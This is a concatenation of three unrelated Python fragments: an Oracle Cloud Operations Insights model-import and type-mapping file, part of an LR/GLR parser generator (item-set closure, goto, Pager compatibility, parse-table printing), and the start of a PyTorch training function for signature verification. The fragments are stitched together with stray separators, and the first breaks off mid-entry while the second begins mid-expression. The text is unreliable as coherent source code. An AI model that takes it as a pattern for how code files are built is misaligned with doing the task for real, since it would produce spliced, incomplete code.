from .summary_statistics import SummaryStatistics
from .tablespace_usage_trend import TablespaceUsageTrend
from .tablespace_usage_trend_aggregation import TablespaceUsageTrendAggregation
from .top_processes_usage_trend import TopProcessesUsageTrend
from .top_processes_usage_trend_aggregation import TopProcessesUsageTrendAggregation
from .update_autonomous_database_insight_details import UpdateAutonomousDatabaseInsightDetails
from .update_awr_hub_details import UpdateAwrHubDetails
from .update_database_insight_details import UpdateDatabaseInsightDetails
from .update_em_managed_external_database_insight_details import UpdateEmManagedExternalDatabaseInsightDetails
from .update_em_managed_external_exadata_insight_details import UpdateEmManagedExternalExadataInsightDetails
from .update_em_managed_external_host_insight_details import UpdateEmManagedExternalHostInsightDetails
from .update_enterprise_manager_bridge_details import UpdateEnterpriseManagerBridgeDetails
from .update_exadata_insight_details import UpdateExadataInsightDetails
from .update_host_insight_details import UpdateHostInsightDetails
from .update_macs_managed_external_database_insight_details import UpdateMacsManagedExternalDatabaseInsightDetails
from .update_macs_managed_external_host_insight_details import UpdateMacsManagedExternalHostInsightDetails
from .update_operations_insights_private_endpoint_details import UpdateOperationsInsightsPrivateEndpointDetails
from .update_operations_insights_warehouse_details import UpdateOperationsInsightsWarehouseDetails
from .update_operations_insights_warehouse_user_details import UpdateOperationsInsightsWarehouseUserDetails
from .update_pe_comanaged_database_insight_details import UpdatePeComanagedDatabaseInsightDetails
from .work_request import WorkRequest
from .work_request_collection import WorkRequestCollection
from .work_request_error import WorkRequestError
from .work_request_error_collection import WorkRequestErrorCollection
from .work_request_log_entry import WorkRequestLogEntry
from .work_request_log_entry_collection import WorkRequestLogEntryCollection
from .work_request_resource import WorkRequestResource
from .work_requests import WorkRequests
# Maps type names to classes for opsi services.
opsi_type_mapping = {
"AddEmManagedExternalExadataInsightMembersDetails": AddEmManagedExternalExadataInsightMembersDetails,
"AddExadataInsightMembersDetails": AddExadataInsightMembersDetails,
"AutonomousDatabaseConfigurationSummary": AutonomousDatabaseConfigurationSummary,
"AutonomousDatabaseInsight": AutonomousDatabaseInsight,
"AutonomousDatabaseInsightSummary": AutonomousDatabaseInsightSummary,
"AwrHub": AwrHub,
"AwrHubSummary": AwrHubSummary,
"AwrHubSummaryCollection": AwrHubSummaryCollection,
"AwrHubs": AwrHubs,
"AwrReport": AwrReport,
"AwrSnapshotCollection": AwrSnapshotCollection,
"AwrSnapshotSummary": AwrSnapshotSummary,
"AwrSourceSummary": AwrSourceSummary,
"ChangeDatabaseInsightCompartmentDetails": ChangeDatabaseInsightCompartmentDetails,
"ChangeEnterpriseManagerBridgeCompartmentDetails": ChangeEnterpriseManagerBridgeCompartmentDetails,
"ChangeExadataInsightCompartmentDetails": ChangeExadataInsightCompartmentDetails,
"ChangeHostInsightCompartmentDetails": ChangeHostInsightCompartmentDetails,
"ChangeOperationsInsightsPrivateEndpointCompartmentDetails": ChangeOperationsInsightsPrivateEndpointCompartmentDetails,
"ChangePeComanagedDatabaseInsightDetails": ChangePeComanagedDatabaseInsightDetails,
"ConnectionDetails": ConnectionDetails,
"CreateAwrHubDetails": CreateAwrHubDetails,
"CreateDatabaseInsightDetails": CreateDatabaseInsightDetails,
"CreateEmManagedExternalDatabaseInsightDetails": CreateEmManagedExternalDatabaseInsightDetails,
"CreateEmManagedExternalExadataInsightDetails": CreateEmManagedExternalExadataInsightDetails,
"CreateEmManagedExternalExadataMemberEntityDetails": CreateEmManagedExternalExadataMemberEntityDetails,
"CreateEmManagedExternalHostInsightDetails": CreateEmManagedExternalHostInsightDetails,
"CreateEnterpriseManagerBridgeDetails": CreateEnterpriseManagerBridgeDetails,
"CreateExadataInsightDetails": CreateExadataInsightDetails,
"CreateHostInsightDetails": CreateHostInsightDetails,
"CreateMacsManagedExternalHostInsightDetails": CreateMacsManagedExternalHostInsightDetails,
"CreateOperationsInsightsPrivateEndpointDetails": CreateOperationsInsightsPrivateEndpointDetails,
"CreateOperationsInsightsWarehouseDetails": CreateOperationsInsightsWarehouseDetails,
"CreateOperationsInsightsWarehouseUserDetails": CreateOperationsInsightsWarehouseUserDetails,
"CreatePeComanagedDatabaseInsightDetails": CreatePeComanagedDatabaseInsightDetails,
"CredentialByVault": CredentialByVault,
"CredentialDetails": CredentialDetails,
"CredentialsBySource": CredentialsBySource,
"DBExternalInstance": DBExternalInstance,
"DBExternalProperties": DBExternalProperties,
"DBOSConfigInstance": DBOSConfigInstance,
"DatabaseConfigurationCollection": DatabaseConfigurationCollection,
"DatabaseConfigurationMetricGroup": DatabaseConfigurationMetricGroup,
"DatabaseConfigurationSummary": DatabaseConfigurationSummary,
"DatabaseDetails": DatabaseDetails,
"DatabaseInsight": DatabaseInsight,
"DatabaseInsightSummary": DatabaseInsightSummary,
"DatabaseInsights": DatabaseInsights,
"DatabaseInsightsCollection": DatabaseInsightsCollection,
"DiskGroupDetails": DiskGroupDetails,
"DownloadOperationsInsightsWarehouseWalletDetails": DownloadOperationsInsightsWarehouseWalletDetails,
"EmManagedExternalDatabaseConfigurationSummary": EmManagedExternalDatabaseConfigurationSummary,
"EmManagedExternalDatabaseInsight": EmManagedExternalDatabaseInsight,
"EmManagedExternalDatabaseInsightSummary": EmManagedExternalDatabaseInsightSummary,
"EmManagedExternalExadataInsight": EmManagedExternalExadataInsight,
"EmManagedExternalExadataInsightSummary": EmManagedExternalExadataInsightSummary,
"EmManagedExternalHostConfigurationSummary": EmManagedExternalHostConfigurationSummary,
"EmManagedExternalHostInsight": EmManagedExternalHostInsight,
"EmManagedExternalHostInsightSummary": EmManagedExternalHostInsightSummary,
"EnableDatabaseInsightDetails": EnableDatabaseInsightDetails,
"EnableEmManagedExternalDatabaseInsightDetails": EnableEmManagedExternalDatabaseInsightDetails,
"EnableEmManagedExternalExadataInsightDetails": EnableEmManagedExternalExadataInsightDetails,
"EnableEmManagedExternalHostInsightDetails": EnableEmManagedExternalHostInsightDetails,
"EnableExadataInsightDetails": EnableExadataInsightDetails,
"EnableHostInsightDetails": EnableHostInsightDetails,
"EnableMacsManagedExternalHostInsightDetails": EnableMacsManagedExternalHostInsightDetails,
"EnablePeComanagedDatabaseInsightDetails": EnablePeComanagedDatabaseInsightDetails,
"EnterpriseManagerBridge": EnterpriseManagerBridge,
"EnterpriseManagerBridgeCollection": EnterpriseManagerBridgeCollection,
"EnterpriseManagerBridgeSummary": EnterpriseManagerBridgeSummary,
"EnterpriseManagerBridges": EnterpriseManagerBridges,
"ExadataConfigurationCollection": ExadataConfigurationCollection,
"ExadataConfigurationSummary": ExadataConfigurationSummary,
"ExadataDatabaseMachineConfigurationSummary": ExadataDatabaseMachineConfigurationSummary,
"ExadataDatabaseStatisticsSummary": ExadataDatabaseStatisticsSummary,
"ExadataDetails": ExadataDetails,
"ExadataDiskgroupStatisticsSummary": ExadataDiskgroupStatisticsSummary,
"ExadataHostStatisticsSummary": ExadataHostStatisticsSummary,
"ExadataInsight": ExadataInsight,
"ExadataInsightResourceCapacityTrendAggregation": ExadataInsightResourceCapacityTrendAggregation,
"ExadataInsightResourceCapacityTrendSummary": ExadataInsightResourceCapacityTrendSummary,
"ExadataInsightResourceForecastTrendSummary": ExadataInsightResourceForecastTrendSummary,
"ExadataInsightResourceInsightUtilizationItem": ExadataInsightResourceInsightUtilizationItem,
"ExadataInsightResourceStatistics": ExadataInsightResourceStatistics,
"ExadataInsightResourceStatisticsAggregation": ExadataInsightResourceStatisticsAggregation,
"ExadataInsightSummary": ExadataInsightSummary,
"ExadataInsightSummaryCollection": ExadataInsightSummaryCollection,
"ExadataInsights": ExadataInsights,
"ExadataMemberCollection": ExadataMemberCollection,
"ExadataMemberSummary": ExadataMemberSummary,
"ExadataStorageServerStatisticsSummary": ExadataStorageServerStatisticsSummary,
"HistoricalDataItem": HistoricalDataItem,
"HostConfigurationCollection": HostConfigurationCollection,
"HostConfigurationMetricGroup": HostConfigurationMetricGroup,
"HostConfigurationSummary": HostConfigurationSummary,
"HostCpuHardwareConfiguration": HostCpuHardwareConfiguration,
"HostCpuStatistics": HostCpuStatistics,
"HostCpuUsage": HostCpuUsage,
"HostDetails": HostDetails,
"HostEntities": HostEntities,
"HostHardwareConfiguration": HostHardwareConfiguration,
"HostImportableAgentEntitySummary": HostImportableAgentEntitySummary,
"HostInsight": HostInsight,
"HostInsightResourceStatisticsAggregation": HostInsightResourceStatisticsAggregation,
"HostInsightSummary": HostInsightSummary,
"HostInsightSummaryCollection": HostInsightSummaryCollection,
"HostInsights": HostInsights,
"HostInstanceMap": HostInstanceMap,
"HostMemoryConfiguration": HostMemoryConfiguration,
"HostMemoryStatistics": HostMemoryStatistics,
"HostMemoryUsage": HostMemoryUsage,
"HostNetworkActivitySummary": HostNetworkActivitySummary,
"HostNetworkConfiguration": HostNetworkConfiguration,
"HostPerformanceMetricGroup": HostPerformanceMetricGroup,
"HostProduct": HostProduct,
"HostResourceAllocation": HostResourceAllocation,
"HostResourceCapacityTrendAggregation": HostResourceCapacityTrendAggregation,
"HostResourceStatistics": HostResourceStatistics,
"HostTopProcesses": HostTopProcesses,
"HostedEntityCollection": HostedEntityCollection,
"HostedEntitySummary": HostedEntitySummary,
"ImportableAgentEntitySummary": ImportableAgentEntitySummary,
"ImportableAgentEntitySummaryCollection": ImportableAgentEntitySummaryCollection,
"ImportableEnterpriseManagerEntity": ImportableEnterpriseManagerEntity,
"ImportableEnterpriseManagerEntityCollection": ImportableEnterpriseManagerEntityCollection,
"IngestDatabaseConfigurationDetails": IngestDatabaseConfigurationDetails,
"IngestDatabaseConfigurationResponseDetails": IngestDatabaseConfigurationResponseDetails,
"IngestHostConfigurationDetails": IngestHostConfigurationDetails,
"IngestHostConfigurationResponseDetails": IngestHostConfigurationResponseDetails,
"IngestHostMetricsDetails": IngestHostMetricsDetails,
"IngestHostMetricsResponseDetails": IngestHostMetricsResponseDetails,
"IngestSqlBucketDetails": IngestSqlBucketDetails,
"IngestSqlBucketResponseDetails": IngestSqlBucketResponseDetails,
"IngestSqlPlanLinesDetails": IngestSqlPlanLinesDetails,
"IngestSqlPlanLinesResponseDetails": IngestSqlPlanLinesResponseDetails,
"IngestSqlStatsDetails": IngestSqlStatsDetails,
"IngestSqlStatsResponseDetails": IngestSqlStatsResponseDetails,
"IngestSqlTextDetails": IngestSqlTextDetails,
"IngestSqlTextResponseDetails": IngestSqlTextResponseDetails,
"InstanceMetrics": InstanceMetrics,
"MacsManagedExternalDatabaseConfigurationSummary": MacsManagedExternalDatabaseConfigurationSummary,
"MacsManagedExternalDatabaseInsight": MacsManagedExternalDatabaseInsight,
"MacsManagedExternalDatabaseInsightSummary": MacsManagedExternalDatabaseInsightSummary,
"MacsManagedExternalHostConfigurationSummary": MacsManagedExternalHostConfigurationSummary,
"MacsManagedExternalHostInsight": MacsManagedExternalHostInsight,
"MacsManagedExternalHostInsightSummary": MacsManagedExternalHostInsightSummary,
"OperationsInsightsPrivateEndpoint": OperationsInsightsPrivateEndpoint,
"OperationsInsightsPrivateEndpointCollection": OperationsInsightsPrivateEndpointCollection,
"OperationsInsightsPrivateEndpointSummary": OperationsInsightsPrivateEndpointSummary,
"OperationsInsightsWarehouse": OperationsInsightsWarehouse,
"OperationsInsightsWarehouseSummary": OperationsInsightsWarehouseSummary,
"OperationsInsightsWarehouseSummaryCollection": OperationsInsightsWarehouseSummaryCollection,
"OperationsInsightsWarehouseUser": OperationsInsightsWarehouseUser,
"OperationsInsightsWarehouseUserSummary": OperationsInsightsWarehouseUserSummary,
"OperationsInsightsWarehouseUserSummaryCollection": OperationsInsightsWarehouseUserSummaryCollection,
"OperationsInsightsWarehouseUsers": OperationsInsightsWarehouseUsers,
"OperationsInsightsWarehouses": OperationsInsightsWarehouses,
"PeComanagedDatabaseConnectionDetails": PeComanagedDatabaseConnectionDetails,
"PeComanagedDatabaseHostDetails": PeComanagedDatabaseHostDetails,
"PeComanagedDatabaseInsight": PeComanagedDatabaseInsight,
"PeComanagedDatabaseInsightSummary": PeComanagedDatabaseInsightSummary,
"PeComanagedManagedExternalDatabaseConfigurationSummary": PeComanagedManagedExternalDatabaseConfigurationSummary,
"ProjectedDataItem": ProjectedDataItem,
"ResourceCapacityTrendAggregation": ResourceCapacityTrendAggregation,
"ResourceInsightCurrentUtilization": ResourceInsightCurrentUtilization,
"ResourceInsightProjectedUtilization": ResourceInsightProjectedUtilization,
"ResourceInsightProjectedUtilizationItem": ResourceInsightProjectedUtilizationItem,
"ResourceStatistics": ResourceStatistics,
"ResourceStatisticsAggregation": ResourceStatisticsAggregation,
"ResourceUsageSummary": ResourceUsageSummary,
"ResourceUsageTrendAggregation": ResourceUsageTrendAggregation,
"SqlBucket": SqlBucket,
"SqlInsightAggregation": SqlInsightAggregation,
"SqlInsightAggregationCollection": SqlInsightAggregationCollection,
"SqlInsightThresholds": SqlInsightThresholds,
"SqlInventory": SqlInventory,
"SqlPlanCollection": SqlPlanCollection,
"SqlPlanInsightAggregation": SqlPlanInsightAggregation,
"SqlPlanInsightAggregationCollection": SqlPlanInsightAggregationCollection,
"SqlPlanInsights": SqlPlanInsights,
"SqlPlanLine": SqlPlanLine,
"SqlPlanSummary": SqlPlanSummary,
"SqlResponseTimeDistributionAggregation": SqlResponseTimeDistributionAggregation,
"SqlResponseTimeDistributionAggregationCollection": SqlResponseTimeDistributionAggregationCollection,
"SqlSearchCollection": SqlSearchCollection,
"SqlSearchSummary": SqlSearchSummary,
"SqlStatisticAggregation": SqlStatisticAggregation,
"SqlStatisticAggregationCollection": SqlStatisticAggregationCollection,
"SqlStatistics": SqlStatistics,
"SqlStatisticsTimeSeries": SqlStatisticsTimeSeries,
"SqlStatisticsTimeSeriesAggregation": SqlStatisticsTimeSeriesAggregation,
"SqlStatisticsTimeSeriesAggregationCollection": SqlStatisticsTimeSeriesAggregationCollection,
"SqlStatisticsTimeSeriesByPlanAggregation": SqlStatisticsTimeSeriesByPlanAggregation,
"SqlStatisticsTimeSeriesByPlanAggregationCollection": SqlStatisticsTimeSeriesByPlanAggregationCollection,
"SqlStats": SqlStats,
"SqlText": SqlText,
"SqlTextCollection": SqlTextCollection,
"SqlTextSummary": SqlTextSummary,
"StorageServerDetails": StorageServerDetails,
"SummarizeAwrSourcesSummariesCollection": SummarizeAwrSourcesSummariesCollection,
"SummarizeDatabaseInsightResourceCapacityTrendAggregationCollection": SummarizeDatabaseInsightResourceCapacityTrendAggregationCollection,
"SummarizeDatabaseInsightResourceForecastTrendAggregation": SummarizeDatabaseInsightResourceForecastTrendAggregation,
"SummarizeDatabaseInsightResourceStatisticsAggregationCollection": SummarizeDatabaseInsightResourceStatisticsAggregationCollection,
"SummarizeDatabaseInsightResourceUsageAggregation": SummarizeDatabaseInsightResourceUsageAggregation,
"SummarizeDatabaseInsightResourceUsageTrendAggregationCollection": SummarizeDatabaseInsightResourceUsageTrendAggregationCollection,
"SummarizeDatabaseInsightResourceUtilizationInsightAggregation": SummarizeDatabaseInsightResourceUtilizationInsightAggregation,
"SummarizeDatabaseInsightTablespaceUsageTrendAggregationCollection": SummarizeDatabaseInsightTablespaceUsageTrendAggregationCollection,
"SummarizeExadataInsightResourceCapacityTrendAggregation": SummarizeExadataInsightResourceCapacityTrendAggregation,
"SummarizeExadataInsightResourceCapacityTrendCollection": SummarizeExadataInsightResourceCapacityTrendCollection,
"SummarizeExadataInsightResourceForecastTrendAggregation": SummarizeExadataInsightResourceForecastTrendAggregation,
"SummarizeExadataInsightResourceForecastTrendCollection": SummarizeExadataInsightResourceForecastTrendCollection,
"SummarizeExadataInsightResourceStatisticsAggregationCollection": SummarizeExadataInsightResourceStatisticsAggregationCollection,
"SummarizeExadataInsightResourceUsageAggregation": SummarizeExadataInsightResourceUsageAggregation,
"SummarizeExadataInsightResourceUsageCollection": SummarizeExadataInsightResourceUsageCollection,
"SummarizeExadataInsightResourceUtilizationInsightAggregation": SummarizeExadataInsightResourceUtilizationInsightAggregation,
"SummarizeHostInsightResourceCapacityTrendAggregationCollection": SummarizeHostInsightResourceCapacityTrendAggregationCollection,
"SummarizeHostInsightResourceForecastTrendAggregation": SummarizeHostInsightResourceForecastTrendAggregation,
"SummarizeHostInsightResourceStatisticsAggregationCollection": SummarizeHostInsightResourceStatisticsAggregationCollection,
"SummarizeHostInsightResourceUsageAggregation": SummarizeHostInsightResourceUsageAggregation,
"SummarizeHostInsightResourceUsageTrendAggregationCollection": SummarizeHostInsightResourceUsageTrendAggregationCollection,
"SummarizeHostInsightResourceUtilizationInsightAggregation": SummarizeHostInsightResourceUtilizationInsightAggregation,
"SummarizeHostInsightsTopProcessesUsageTrendCollection": SummarizeHostInsightsTopProcessesUsageTrendCollection,
"SummarizeOperationsInsightsWarehouseResourceUsageAggregation": SummarizeOperationsInsightsWarehouseResourceUsageAggregation,
"SummaryStatistics": SummaryStatistics,
"TablespaceUsageTrend": TablespaceUsageTrend,
"TablespaceUsageTrendAggregation": TablespaceUsageTrendAggregation,
"TopProcessesUsageTrend": TopProcessesUsageTrend,
"TopProcessesUsageTrendAggregation": TopProcessesUsageTrendAggregation,
"UpdateAutonomousDatabaseInsightDetails": UpdateAutonomousDatabaseInsightDetails,
"UpdateAwrHubDetails": UpdateAwrHubDetails,
"UpdateDatabaseInsightDetails": UpdateDatabaseInsightDetails,
"UpdateEmManagedExternalDatabaseInsightDetails": UpdateEmManagedExternalDatabaseInsightDetails,
"UpdateEmManagedExternalExadataInsightDetails": UpdateEmManagedExternalExadataInsightDetails,
"UpdateEmManagedExternalHostInsightDetails": UpdateEmManagedExternalHostInsightDetails,
"UpdateEnterpriseManagerBridgeDetails": UpdateEnterpriseManagerBridgeDetails,
"UpdateExadataInsightDetails": UpdateExadataInsightDetails,
"UpdateHostInsightDetails": UpdateHostInsightDetails,
"UpdateMacsManagedExternalDatabaseInsightDetails": | |
!= "<S>"
yield item
# Merge a kernel item.
def append(self, item):
assert item.production.lhs.name == "<S>" or item.dotPos != 0
if item in self:
self[item].lookahead.update(item.lookahead)
else:
tItem = Item(item.production, item.dotPos, item.lookahead.keys())
self[tItem] = tItem
# Merge an added item.
def addedAppend(self, item):
assert item.dotPos == 0
assert item.production.lhs.name != "<S>"
if item in self._added:
lookahead = self._added[item].lookahead
oldLen = len(lookahead)
lookahead.update(item.lookahead)
return (oldLen != len(lookahead))
else:
self._added[item] = item
return True
# Given a list of items, compute their closure and merge the results into
# the set of added items.
def _closeItems(self, items):
# Iterate over the items until no more can be added to the closure.
i = 0
while i < len(items):
item = items[i]
rhs = item.production.rhs
dotPos = item.dotPos
if dotPos < len(rhs) \
and isinstance(rhs[dotPos], NontermSpec):
for lookahead in item.lookahead.keys():
string = StringSpec( \
String(rhs[dotPos+1:] + [lookahead]))
lhs = rhs[dotPos]
for prod in lhs.productions:
tItem = Item(prod, 0, string.firstSet)
if self.addedAppend(tItem):
items.append(tItem)
i += 1
# Calculate and merge the kernel's transitive closure.
def closure(self):
items = []
for item in self.iterkeys():
rhs = item.production.rhs
dotPos = item.dotPos
if dotPos < len(rhs) and isinstance(rhs[dotPos], \
NontermSpec):
for lookahead in item.lookahead.iterkeys():
string = StringSpec(String(rhs[dotPos+1:] + \
[lookahead]))
lhs = rhs[dotPos]
for prod in lhs.productions:
tItem = Item(prod, 0, string.firstSet)
if self.addedAppend(tItem):
items.append(tItem)
self._closeItems(items)
# Calculate the kernel of the goto set, given a particular symbol.
def goto(self, sym):
ret = ItemSet()
for item in self:
rhs = item.production.rhs
dotPos = item.dotPos
if dotPos < len(rhs) and rhs[dotPos] == sym:
tItem = Item(item.production, dotPos + 1, item.lookahead.keys())
ret.append(tItem)
return ret
# Merge the kernel of other into this ItemSet, then update the closure.
# It is not sufficient to copy other's added items, since other has not
# computed its closure.
def merge(self, other):
items = []
for item in other.iterkeys():
if item in self:
lookahead = self[item].lookahead
tLookahead = []
for sym in item.lookahead.iterkeys():
if sym not in lookahead:
lookahead[sym] = sym
tLookahead.append(sym)
if len(tLookahead) > 0:
tItem = Item(item.production, item.dotPos, tLookahead)
items.append(tItem)
else:
tItem = Item(item.production, item.dotPos, \
item.lookahead.keys())
self[tItem] = tItem
items.append(tItem)
if len(items) > 0:
self._closeItems(items)
return True
else:
return False
# Determine if self and other are weakly compatible, as defined by the
# Pager(1977) algorithm.
def weakCompat(self, other):
# Check for identical kernel LR(0) items, and pair items, for later use.
if len(self) != len(other):
return False
pairs = []
for sItem in self.iterkeys():
if sItem not in other:
return False
oItem = other[sItem]
pairs.append((sItem, oItem))
# Check for lookahead compatibility.
for i in xrange(len(pairs)-1):
iPair = pairs[i]
isItem = iPair[0]
ioItem = iPair[1]
for j in xrange(i+1, len(pairs)):
jPair = pairs[j]
jsItem = jPair[0]
joItem = jPair[1]
if isItem.lookaheadDisjoint(joItem) \
and ioItem.lookaheadDisjoint(jsItem):
pass
elif not isItem.lookaheadDisjoint(jsItem):
pass
elif not ioItem.lookaheadDisjoint(joItem):
pass
else:
return False
return True
class Action(object):
"""
Abstract base class, subclassed by {Shift,Reduce}Action.
"""
def __init__(self): pass
class ShiftAction(Action):
"""
Shift action, with assocated nextState.
"""
def __init__(self, nextState):
Action.__init__(self)
self.nextState = nextState
def __repr__(self):
return "[shift %r]" % self.nextState
def __eq__(self, other):
if not isinstance(other, ShiftAction):
return False
if self.nextState != other.nextState:
return False
return True
class ReduceAction(Action):
"""
Reduce action, with associated production.
"""
def __init__(self, production):
Action.__init__(self)
self.production = production
def __repr__(self):
return "[reduce %r]" % self.production
def __eq__(self, other):
if not isinstance(other, ReduceAction):
return False
if self.production != other.production:
return False
return True
class Spec(object):
"""
The Spec class contains the read-only data structures that the Parser
class needs in order to parse input. Parser generation results in a
Spec instance, which can then be shared by multiple Parser instances.
"""
def __init__(self, modules, pickleFile=None, pickleMode="rw",
skinny=True, logFile=None, graphFile=None, verbose=False):
"""
modules : Either a single module, or a list of modules, wherein to
look for parser generator directives in docstrings.
pickleFile : The path of a file to use for Spec pickling/unpickling.
pickleMode : "r" : Unpickle from pickleFile.
"w" : Pickle to pickleFile.
"rw" : Unpickle/pickle from/to pickleFile.
skinny : If true, discard all data that are only strictly necessary
while constructing the parsing tables. This reduces
available debugging context, but substantially reduces
pickle size.
logFile : The path of a file to store a human-readable copy of the
parsing tables in.
graphFile : The path of a file to store a graphviz representation
(dot format) of the precedence relationship graph.
verbose : If true, print progress information while generating the
parsing tables.
"""
assert pickleFile == None or type(pickleFile) == str
assert pickleMode in ["rw", "r", "w"]
assert type(skinny) == bool
assert logFile == None or type(logFile) == str
assert graphFile == None or type(graphFile) == str
assert type(verbose) == bool
self._skinny = skinny
self._verbose = verbose
# Default (no) precedence.
self._none = Precedence("none", "fail", {})
self._split = Precedence("split", "split", {})
# Symbols are maintained as two separate sets so that non-terminals and
# terminals (tokens) can be operated on separately where needed.
self._precedences = {self._none.name: self._none,
self._split.name: self._split}
self._nonterms = {}
self._tokens = {eoi.name: eoi, epsilon.name: epsilon}
self._sym2spec = {EndOfInput: eoi, Epsilon: epsilon}
self._productions = []
self._userStartSym = None
self._startSym = None
self._startProd = None
# Everything below this point is computed from the above (once
# introspection is complete).
self._itemSets = [] # Each element corresponds to an element in _action.
self._itemSetsHash = None
# LR parsing tables. The tables conceptually contain one state per row,
# where each row contains one element per symbol. The table is
# conceptually in row-major form, but each row is actually a dictionary.
# If no entry for a symbol exists for a particular state, then input of
# that symbol is an error for that state.
self._action = []
self._goto = []
self._startState = None
self._nActions = 0
self._nConflicts = 0
self._nImpure = 0 # Number of LR impurities (does not affect GLR).
# Introspect modules and generate parse tables.
if type(modules) == types.ModuleType:
# Wrap single module in a list.
modules = [modules]
self._prepare(modules, pickleFile, pickleMode, logFile, graphFile)
def __getPureLR(self):
return (self._nConflicts + self._nImpure == 0)
def __setPureLR(self): raise AttributeError
pureLR = property(__getPureLR, __setPureLR)
def __getConflicts(self): return self._nConflicts
def __setConflicts(self): raise AttributeError
conflicts = property(__getConflicts, __setConflicts)
def __repr__(self):
if self._skinny:
# Print a very reduced summary, since most info has been discarded.
return "Parsing.Spec: %d states, %d actions (%d split)" % \
(len(self._action), self._nActions, self._nImpure)
lines = []
#=======================================================================
lines.append("Precedences:")
deco = [(prec.name, prec) for prec in self._precedences.itervalues()]
deco.sort()
for elm in deco:
prec = elm[1]
lines.append(" %r" % prec)
lines.append("Tokens:")
syms = [sym for sym in self._tokens.itervalues()]
syms.sort()
for token in syms:
lines.append(" %r %r" % (token, token.prec))
lines.append(" First set: %r" % token.firstSet)
lines.append(" Follow set: %r" % token.followSet)
lines.append("Non-terminals:")
syms = [sym for sym in self._nonterms.itervalues()]
syms.sort()
for sym in syms:
lines.append(" %r %r" % (sym, sym.prec))
lines.append(" First set: %r" % sym.firstSet)
lines.append(" Follow set: %r" % sym.followSet)
lines.append(" Productions:")
prods = sym.productions[:]
prods.sort()
for prod in prods:
lines.append(" %r" % prod)
lines.append("Item sets:")
for i in xrange(len(self._itemSets)):
lines.append(" %d: %r" % (i, self._itemSets[i]))
#=======================================================================
ntokens = len(self._tokens) - 1
nnonterms = len(self._nonterms) - 1
nproductions = len(self._productions) - 1
nstates = len(self._action)
lines.append(("Parsing.Spec: %d token%s, %d non-terminal%s, " + \
"%d production%s, %d state%s, %d action%s (%d split):") % \
(ntokens, ("s", "")[ntokens == 1], \
nnonterms, ("s", "")[nnonterms == 1], \
nproductions, ("s", "")[nproductions == 1], \
nstates, ("s", "")[nstates == 1], \
self._nActions, ("s", "")[self._nActions == 1], \
self._nImpure))
if self.pureLR:
lines.append("Algorithm compatibility: GLR, LR")
elif self._nConflicts == 0:
lines.append("Algorithm compatibility: GLR")
else:
lines.append("Algorithm compatibility: None, due to ambiguity")
lines.append("Parsing tables:")
for i in xrange(len(self._action)):
lines.append(" %s" % ("=" * 78))
lines.append(" State %d:%s" % \
(i, ("", " (start state)")[self._startState == i]))
items = [item for item in self._itemSets[i]]
items.sort()
for item in items:
lines.append(" %s%s" % (" " * (len("%d" % i) + 9),
item.lr0__repr__()))
lines.append(" Goto:")
syms = [sym for sym in self._goto[i]]
syms.sort()
for sym in syms:
lines.append(" %15r : %r" % (sym, self._goto[i][sym]))
lines.append(" Action:")
syms = [sym for sym in self._action[i]]
syms.sort()
for sym in syms:
for action in self._action[i][sym]:
conflict = " "
for other in self._action[i][sym]:
if action != other:
resolution = self._resolve(sym, other, action)
if resolution == "err":
conflict = "XXX"
break
if type(action) == ShiftAction:
lines.append("%s %15r : %-6s %d [%s]" % \
(conflict, sym, "shift", action.nextState, \
sym.prec.name))
else:
assert type(action) == ReduceAction
lines.append("%s %15r : %-6s %r" % \
(conflict, sym, "reduce", action.production))
ret = "\n".join(lines)
return ret
def _prepare(self, modules, pickleFile, pickleMode, logFile, graphFile):
"""
Compile the specification into data structures that can be used by
the Parser class for parsing.
"""
# Get the grammar specification.
self._introspect(modules)
# Augment grammar with a special start symbol and production:
#
# <S> ::= S <$>.
assert self._startSym == None
assert isinstance(self._userStartSym, NontermSpec)
self._startSym = NontermSpec(NontermStart, "<S>",
"%s.NontermStart" % __name__, | |
<filename>sigver/featurelearning/train.py<gh_stars>0
import argparse
import pathlib
from collections import OrderedDict
import numpy as np
from typing import Dict, Tuple, Any, Optional
from sklearn.preprocessing import LabelEncoder
import torch
from torch import nn
from torch.nn import functional as F
from torch import optim
from torch.utils.data import TensorDataset, random_split, DataLoader
from torchvision import transforms
from visdom_logger.logger import VisdomLogger
import sigver.datasets.util as util
from sigver.featurelearning.data import TransformDataset
import sigver.featurelearning.models as models
def train(base_model: torch.nn.Module,
classification_layer: torch.nn.Module,
forg_layer: torch.nn.Module,
train_loader: torch.utils.data.DataLoader,
val_loader: torch.utils.data.DataLoader,
device: torch.device,
callback: Optional[VisdomLogger],
args: Any,
logdir: Optional[pathlib.Path]):
""" Trains a network using either SigNet or SigNet-F loss functions on
https://arxiv.org/abs/1705.05787 (e.q. (1) and (4) on the paper)
Parameters
----------
base_model: torch.nn.Module
The model architecture that "extract features" from signatures
classification_layer: torch.nn.Module
The classification layer (from features to predictions of which user
wrote the signature)
forg_layer: torch.nn.Module
The forgery prediction layer (from features to predictions of whether
the signature is a forgery). Only used in args.forg = True
train_loader: torch.utils.data.DataLoader
Iterable that loads the training set (x, y) tuples
val_loader: torch.utils.data.DataLoader
Iterable that loads the validation set (x, y) tuples
device: torch.device
The device (CPU or GPU) to use for training
callback: VisdomLogger (optional)
A callback to report the training progress
args: Namespace
Extra arguments for training: epochs, lr, lr_decay, lr_decay_times, momentum, weight_decay
logdir: str
Where to save the model and training curves
Returns
-------
Dict (str -> tensors)
The trained weights
"""
# Collect all parameters that need to be optimizer
parameters = list(base_model.parameters()) + list(classification_layer.parameters())
if args.forg:
parameters.extend(forg_layer.parameters())
# Initialize optimizer and learning rate scheduler
optimizer = optim.SGD(parameters, lr=args.lr, momentum=args.momentum,
nesterov=True, weight_decay=args.weight_decay)
lr_scheduler = optim.lr_scheduler.StepLR(optimizer,
args.epochs // args.lr_decay_times,
args.lr_decay)
best_acc = 0
best_params = get_parameters(base_model, classification_layer, forg_layer)
for epoch in range(args.epochs):
# Train one epoch; evaluate on validation
train_epoch(train_loader, base_model, classification_layer, forg_layer,
epoch, optimizer, lr_scheduler, callback, device, args)
val_metrics = test(val_loader, base_model, classification_layer, device, args.forg, forg_layer)
val_acc, val_loss, val_forg_acc, val_forg_loss = val_metrics
# Save the best model only on improvement (early stopping)
if val_acc >= best_acc:
best_acc = val_acc
best_params = get_parameters(base_model, classification_layer, forg_layer)
if logdir is not None:
torch.save(best_params, logdir / 'model_best.pth')
if callback:
callback.scalar('val_loss', epoch + 1, val_loss)
callback.scalar('val_acc', epoch + 1, val_acc)
if args.forg:
callback.scalar('val_forg_loss', epoch + 1, val_forg_loss)
callback.scalar('val_forg_acc', epoch + 1, val_forg_acc)
